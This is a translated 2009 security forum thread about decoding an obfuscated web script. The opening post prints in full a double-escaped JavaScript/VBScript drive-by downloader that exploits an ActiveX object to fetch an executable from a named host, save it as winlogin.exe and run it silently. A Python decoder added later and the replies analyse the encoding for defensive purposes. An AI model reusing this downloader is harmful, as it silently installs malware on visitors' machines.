Rising Kaka Security Forum > Technical Exchange > Malicious Website Discussion: A question about networkedition's post??


[Discussion] A question about networkedition's post??


Applying two ESC passes to the code below gives "http://quxiao.91.tc/xzz.exe (don't run it lightly, take care not to get infected)", but I don't quite understand this code. Shellcode is usually decoded the same way, with two ESC passes, and shellcode has a distinctive feature: it is split by a specific delimiter (usually %u) into groups of 4 characters. The code below doesn't look like that, though. I don't understand what the code below is. What are its characteristics or rules? Moderators and experts, please advise. Thanks.

<SCRIPT>var Words="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CSCRIPT LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21%2D%2D%0D%0Avar Words %3D%22%253Chtml%253E%250D%250A%2520%253Cscript%2520language%253D%2522VBScript%2522%253E%250D%250A%2520%2520%2520%2520on%2520error%2520resume%2520next%250D%250A%2520%2520%2520%2520dl%2520%253D%2520%2522http%253A%252F%252Fquxiao%252E91%252Etc%252Fxzz%252Eexe%2522%250D%250A%2520%2520%2520%2520Set%2520df%2520%253D%2520document%252EcreateElement%2528%2522object%2522%2529%250D%250A%2520%2520%2520%2520df%252EsetAttribute%2520%2522classid%2522%252C%2520%2522clsid%253ABD96C556%252D65A3%252D11D0%252D983A%252D00C04FC29E36%2522%250D%250A%2520%2520%2520%2520str%253D%2522Microsoft%252EXMLHTTP%2522%250D%250A%2520%2520%2520%2520Set%2520x%2520%253D%2520df%252ECreateObject%2528str%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520a1%253D%2522Ado%2522%250D%250A%2520%2520%2520%2520a2%253D%2522db%252E%2522%250D%250A%2520%2520%2520%2520a3%253D%2522Str%2522%250D%250A%2520%2520%2520%2520a4%253D%2522eam%2522%250D%250A%2520%2520%2520%2520str1%253Da1%2526a2%2526a3%2526a4%250D%250A%2520%2520%2520%2520str5%253Dstr1%250D%250A%2520%2520%2520%2520set%2520S%2520%253D%2520df%252Ecreateobject%2528str5%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520S%252Etype%2520%253D%25201%250D%250A%2520%2520%2520%2520str6%253D%2522GET%2522%250D%250A%2520%2520%2520%2520x%252EOpen%2520str6%252C%2520dl%252C%2520False%250D%250A%2520%2520%2520%2520x%252ESend%250D%250A%2520%2520%2520%2520fname1%253D%2522winlogin%252Eexe%2522%250D%250A%2520%2520%2520%2520set%2520F%2520%253D%2520df%252Ecreateobject%2528%2522Scripting%252EFileSystemObject%2522%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520set%2520tmp%2520%253D%2520F%252EGetSpecialFolder%25282%2529%2520%250D%250A%2520%2520%2520%2520fname1%253D%2520F%252EBuildPath%2528tmp%252Cfname1%2529%250D%250A%2520%2520%2520%2520S%252Eopen%250D%250A%2520%2520%2520%2520S%252Ewrite%2520x%252EresponseBody%250D%250A%2520%2520%2520%2520S%252Esavetofile%2520fname1%252C2%250D%250A%2520%2520%2520%2520S%252Eclose%250D%250A%2520%2520%2520%2520set%2520Q%2520%253D%2520df%252Ecreateobject%2528%2522Shell%252EApplication%2522%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520Q%252EShellExecute%2520fname1%252C%2522%2522%252C%2522%2522%252C%2522open%2522%252C0%250D%250A%2520%2520%2520%2520%253C%252Fscript%253E%250D%250A%2520%2520%2520%2520%253Chead%253E%250D%250A%2520%2520%2520%2520%253Ctitle%253E%25u65B0%25u4E16%25u7EAA%25u7F51%25u5B89%25u57FA%25u5730%253C%252Ftitle%253E%250D%250A%2520%2520%2520%2520%253C%252Fhead%253E%253Cbody%253E%250D%250A%2509%253Ccenter%253Ehttp%253A%252F%252Fwww%252E520hack%252Ecom%252F%25u5360%25u6709%25u8005%25u5236%25u4F5C%252C%25u8054%25u7CFBQQ%253A8338850%252E%253C%252Fcenter%253E%250D%250A%2520%2520%2520%2520%253C%252Fbody%253E%253C%252Fhtml%253E%250D%250A%22%0D%0Afunction SetNewWords%28%29%0D%0A%7B%0D%0Avar NewWords%3B%0D%0ANewWords %3D unescape%28Words%29%3B%0D%0Adocument%2Ewrite%28NewWords%29%3B%0D%0A%7D%0D%0ASetNewWords%28%29%3B%0D%0A%2F%2F %2D%2D%3E%0D%0A%3C%2FSCRIPT%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
Link: http://quxiao.91.tc/www.htm

User system info: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; CIBA; 360SE)
Last edited by networkedition on 2009-08-22 23:59:17
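An added Python example (not from the original post) that reproduces the two "ESC" passes: it implements JavaScript's unescape() for both %XX and %uXXXX sequences, peels layers until nothing decodes any further, and fingerprints the input first, which makes the sample's rule visible: escape() was applied twice (every % in the outer string is itself encoded as %25), and the %u form only carries the Chinese title text, not shellcode. The input is a short fragment excerpted from the script posted above, chosen so the decoded output is the download URL and the page title.

```python
import re

# JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a Latin-1 byte.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """One pass of JavaScript's unescape(); malformed % sequences stay as-is."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def peel_escape_layers(s: str, max_layers: int = 10):
    """Apply js_unescape until the text stops changing; return (layers, text).

    max_layers guards against input that keeps producing new % sequences.
    """
    layers = 0
    while layers < max_layers:
        decoded = js_unescape(s)
        if decoded == s:
            break
        s, layers = decoded, layers + 1
    return layers, s


def describe(s: str) -> dict:
    """Fingerprint the encoding before decoding it."""
    return {
        # '%25' is escape('%'): its presence means at least one more nested layer
        "nested_percent": len(re.findall(r"%25", s)),
        # %u sequences (the 'shellcode-like' tell) only surface after the outer layer
        "unicode_escapes": len(re.findall(r"%u[0-9A-Fa-f]{4}", s)),
        "byte_escapes": len(re.findall(r"%[0-9A-Fa-f]{2}", s)),
    }


def extract_urls(text: str) -> list:
    """Pull plain http(s) URLs out of decoded text for triage."""
    return re.findall(r"https?://[^\s\"'<>]+", text)


# Fragment excerpted from the posted script: two escape() layers deep.
SAMPLE = ("dl%2520%253D%2520%2522http%253A%252F%252Fquxiao%252E91%252Etc"
          "%252Fxzz%252Eexe%2522%250D%250A%253Ctitle%253E%25u65B0%25u4E16"
          "%25u7EAA%253C%252Ftitle%253E")

if __name__ == "__main__":
    print(describe(SAMPLE))
    layers, text = peel_escape_layers(SAMPLE)
    print(f"layers={layers}")
    print(text)
    print(extract_urls(text))
```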

Reply: A question about networkedition's post??

Heh, all the moderators are here. This one can be decoded with both decoder and freshow.

What I don't understand is which method it used for the encryption, and what its characteristics or rules are???

Reply: A question about networkedition's post??

Heh, you're very attentive, 3Q (thank you).
Powered by Discuz!NT